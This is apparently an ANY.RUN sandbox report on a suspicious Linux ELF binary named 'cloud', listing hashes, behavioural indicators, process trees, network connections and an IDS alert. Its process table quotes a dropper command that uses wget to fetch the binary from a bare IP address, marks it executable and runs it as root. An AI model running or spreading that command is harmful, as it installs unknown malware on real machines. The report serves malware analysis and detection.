download:

/vicidial/cloud

Full analysis: https://app.any.run/tasks/fdb8f6ee-cd34-43e8-ac00-c25a0d97289d
Verdict: Malicious activity
Analysis date: October 25, 2024, 04:54:31
OS: Ubuntu 22.04.2 LTS
MIME: application/x-executable
File info: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
MD5:

2674724C99960521031E36DE3F8FEEEC

SHA1:

B167D83A5D79EC2572F695370E5BDBA3B7983FAB

SHA256:

C8B524CA90ADEA19D920BEB5CC6BD86DD03B23B0B2C61675CEF9D6C0446AEA84

SSDEEP:

98304:clUmkNO/RZ/FUHijM0ug+P4GRM3p8g5tIrSPj9h0ebGT8rAacCvas94LFhOS7Fh5:6/LDQ8ezkv+N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Checks DMI information (probably VM detection)

      • systemd-hostnamed (PID: 35338)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • python3.10 (PID: 35293)

    • Uses wget to download content

      • dash (PID: 35288)

    • Executes commands using command-line interpreter

      • gnome-terminal-server (PID: 35343)
      • su (PID: 35374)

    • Potential Corporate Privacy Violation

      • wget (PID: 35289)

    • Connects to the server without a host name

      • wget (PID: 35289)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.o | ELF Executable and Linkable format (generic) (49.8)

EXIF

EXE

CPUArchitecture: 64 bit
CPUByteOrder: Little endian
ObjectFileType: Executable file
CPUType: AMD x86-64
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
258
Monitored processes
42
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start dash no specs dash no specs wget chmod no specs update-notifier no specs dash no specs python3.10 dpkg no specs dpkg no specs python3.10 no specs python3.10 no specs python3.10 no specs python3.10 no specs dbus-daemon no specs nautilus no specs systemd-hostnamed no specs gnome-terminal-server no specs bash no specs dash no specs basename no specs dash no specs dirname no specs dircolors no specs sudo no specs sudo no specs sudo no specs su no specs bash no specs dash no specs basename no specs dash no specs dirname no specs dircolors no specs ls no specs ls no specs cat no specs bash no specs python3.10 no specs snap no specs bash no specs python3.10 no specs snap no specs

Process information

PID
CMD
Path
Indicators
Parent process
35287/bin/sh -c "wget http://65\.108\.246\.37/vicidial/cloud -O /root/\.cloud && chmod 700 /root\.\.cloud && /root\.cloud & "/usr/bin/dashany-guest-agent
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
35288/bin/sh -c "wget http://65\.108\.246\.37/vicidial/cloud -O /root/\.cloud && chmod 700 /root\.\.cloud && /root\.cloud & "/usr/bin/dashdash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
35289wget http://65.108.246.37/vicidial/cloud -O /root/.cloud/usr/bin/wget
dash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
35290chmod 700 /root..cloud/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
35291update-notifier/usr/bin/update-notifierupdate-notifier
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
35292/bin/sh -c /usr/lib/ubuntu-release-upgrader/check-new-release-gtk/usr/bin/dashupdate-notifier
User:
user
Integrity Level:
UNKNOWN
35293/usr/bin/python3 /usr/lib/ubuntu-release-upgrader/check-new-release-gtk/usr/bin/python3.10
dash
User:
user
Integrity Level:
UNKNOWN
35298/usr/bin/dpkg --print-foreign-architectures/usr/bin/dpkgpython3.10
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
35299/usr/bin/dpkg --print-foreign-architectures/usr/bin/dpkgpython3.10
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
35300/usr/bin/python3 -Es /usr/bin/lsb_release -c -s/usr/bin/python3.10python3.10
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
35456python3.10/var/lib/command-not-found/commands.dbsqlite
MD5:
SHA256:
35289wget/root/.cloudo
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
13
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
488
NetworkManager
GET
204
185.125.190.18:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
35289
wget
GET
200
65.108.246.37:80
http://65.108.246.37/vicidial/cloud
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
35289
wget
65.108.246.37:80
Hetzner Online GmbH
FI
unknown
35293
python3.10
185.125.190.17:443
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
488
NetworkManager
185.125.190.18:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.238
  • 2a00:1450:4001:830::200e
whitelisted
26.100.168.192.in-addr.arpa
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::98
  • 2001:67c:1562::24
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 185.125.190.18
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.97
  • 185.125.190.49
  • 185.125.190.98
  • 91.189.91.98
  • 91.189.91.48
  • 185.125.190.17
  • 185.125.190.96
  • 91.189.91.49
  • 185.125.190.48
whitelisted
changelogs.ubuntu.com
  • 185.125.190.17
  • 185.125.190.18
  • 91.189.91.49
  • 91.189.91.48
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.55
  • 185.125.188.54
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::2e6
whitelisted

Threats

PID
Process
Class
Message
35289
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/vicidial/cloud